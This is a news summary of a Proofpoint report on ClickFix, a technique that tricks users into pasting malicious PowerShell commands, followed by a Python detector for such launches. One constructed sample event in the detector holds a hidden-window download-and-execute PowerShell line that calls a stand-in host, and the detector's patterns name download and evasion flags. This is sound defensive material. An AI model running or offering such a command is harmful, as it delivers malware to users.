Rise in ClickFix Social Engineering Technique Identified
Quick take - Proofpoint researchers have reported a notable increase in the use of the ClickFix social engineering technique, which deceives users into executing malicious PowerShell commands through misleading dialog boxes, with various campaigns linked to different malware types and impersonating well-known services.
Fast Facts
- Rise of ClickFix: Proofpoint researchers report a significant increase in the ClickFix social engineering technique, linked to the initial access broker TA571 and the ClearFake threat cluster, first observed in early 2024.
- Deceptive Execution: ClickFix tricks users into executing PowerShell commands through misleading dialog boxes that present fake error messages, often impersonating well-known software such as Microsoft Word and Google Chrome.
- Malware Delivery: The technique has been associated with various malware types, including AsyncRAT and Danabot, and can originate from compromised websites, documents, and malicious URLs.
- Recent Campaigns: Notable ClickFix campaigns include impersonation of GitHub security warnings and Swiss e-commerce notifications, both directing users to malicious sites to execute harmful commands.
- Mitigation Recommendations: Organizations are advised to implement training focused on ClickFix to reduce exploitation risk; many observed campaigns are financially motivated and lack clear attribution to known threat actors.
Rise of ClickFix Social Engineering Technique
Proofpoint researchers have identified a significant rise in the use of a social engineering technique known as ClickFix, which was first observed in early 2024. This technique is associated with the initial access broker TA571 and the ClearFake threat cluster.
How ClickFix Works
ClickFix is designed to deceive users into executing PowerShell commands that download malware. The method relies on misleading dialog boxes that present fake error messages and prompt the user to “fix” the issue by running a malicious command. Threat actors employing ClickFix have impersonated well-known software and services, including Microsoft Word and Google Chrome. The technique can originate from various sources, such as compromised websites, documents, HTML attachments, and malicious URLs.
In many instances, the user encounters a dialog box reporting an error, which either automatically copies a malicious script for the user to paste into PowerShell or walks the user through manual execution steps. Proofpoint has linked ClickFix campaigns to several malware families, including AsyncRAT, Danabot, DarkGate, Lumma Stealer, and NetSupport.
Recent Campaigns and Variants
A recent variant of ClickFix uses a fake CAPTCHA, claiming to validate users, based on an open-source toolkit called reCAPTCHA Phish, released in mid-September 2024. Shortly after its release, this tool was detected in email threat data. Specific incidents involving ClickFix include a campaign reported on September 18, 2024, which used GitHub notifications to deliver malware. This campaign impersonated GitHub security warnings and directed users to a fraudulent site that utilized the reCAPTCHA Phish and ClickFix techniques to execute PowerShell commands.
Another campaign discovered in September 2024 targeted Swiss organizations, impersonating the Swiss e-commerce marketplace Ricardo. This campaign directed users to a malicious landing page instructing them to execute PowerShell commands that downloaded malware. On September 5, 2024, a campaign was identified in which benign emails masqueraded as security updates and instructed users to run PowerShell commands. Additionally, on September 20, 2024, HTML attachments were used to deliver malware, displaying dialog boxes that prompted the execution of PowerShell commands.
A malvertising campaign using ChatGPT-themed lures to distribute XWorm was observed in mid-October 2024; the malicious site claimed to be a ChatGPT prompt generator. A Ukrainian-language ClickFix campaign targeting organizations in Ukraine was identified on October 31, 2024, using the reCAPTCHA-themed ClickFix technique.
Mitigation and Recommendations
The growing popularity of ClickFix among financially motivated threat actors and suspected espionage groups highlights how the technique exploits users’ desire to resolve issues on their own, which often leads them to bypass security controls. Organizations are encouraged to implement training specifically focused on the ClickFix technique to mitigate the risk of exploitation. Most observed ClickFix campaigns lack attribution to known threat actors, and many appear to be financially motivated. Indicators of compromise for these campaigns include URLs and SHA256 hashes of the malware payloads.
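User training is the mitigation the summary recommends, but the mechanism described under "How ClickFix Works" (a user pasting a script into PowerShell that then downloads a payload) also leaves a distinctive trace in endpoint telemetry, which gives defenders a second layer. The following detection sketch is an added example, not code from Proofpoint or from the article; it assumes Sysmon-style process-creation events already parsed into dictionaries with `ParentImage`, `Image`, `CommandLine` and `User` fields, and the sample events, the placeholder URLs and the `.invalid` host names are constructed, not captured data.

```python
"""
Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example (not from the Proofpoint report summarised above). Assumes a
Sysmon-style Event ID 1 feed parsed into dicts with ParentImage, Image,
CommandLine and User keys. All events below are constructed samples.
"""
from __future__ import annotations
import re

# A user who pastes a "fix" into the Run box or a console spawns PowerShell
# from the desktop shell or cmd.exe, not from a service or an agent.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Indicators seen in the command line; each is a (regex, label) pair.
SUSPICIOUS_PATTERNS = [
    (r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|start-bitstransfer)\b",
     "remote download"),
    (r"(?i)\biex\b|invoke-expression", "dynamic code execution"),
    (r"(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"https?://", "URL in command line"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> dict | None:
    """Return a finding for one process-creation event, or None if benign.

    Fires only when PowerShell is spawned from an interactive parent AND the
    command line matches at least two indicators; the two-indicator floor
    keeps routine administrator one-liners from alerting.
    """
    if basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return None
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return None
    cmd = event.get("CommandLine", "")
    hits = [label for pattern, label in SUSPICIOUS_PATTERNS if re.search(pattern, cmd)]
    if len(hits) < 2:
        return None
    return {"user": event.get("User", "?"), "indicators": hits, "command_line": cmd}


def scan(events: list[dict]) -> list[dict]:
    """Run score_event over a batch and keep only the findings."""
    return [f for f in (score_event(e) for e in events) if f]


# Constructed sample telemetry; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {   # ClickFix-style: user pasted a "fix" that fetches and runs remote code
        "User": "CORP\\alice",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://lure.example.invalid/fix.txt)"',
    },
    {   # Routine admin use from a console: no download, no evasion flags
        "User": "CORP\\bob",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -c "Get-Service | Where-Object Status -eq Running"',
    },
    {   # Agent-driven download: parent is not an interactive shell
        "User": "NT AUTHORITY\\SYSTEM",
        "ParentImage": r"C:\Program Files\Agent\agent.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": 'pwsh.exe -c "Invoke-WebRequest https://updates.example.invalid/pkg.zip -OutFile pkg.zip"',
    },
    {   # Not PowerShell at all
        "User": "CORP\\alice",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {finding['user']}: {', '.join(finding['indicators'])}")
        print(f"        {finding['command_line']}")
```

Only the first sample event fires: it is PowerShell started from explorer.exe with a download cmdlet, `iex`, a hidden window, an execution-policy bypass and a URL in one command line. The same logic covers the variant the article mentions in which the user is walked through manual steps, because the resulting process tree is identical; what it does not cover is a payload fetched by a second stage with a non-interactive parent, so the parent filter should be treated as a tuning knob rather than a fixed rule.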
Original Source: Read the Full Article Here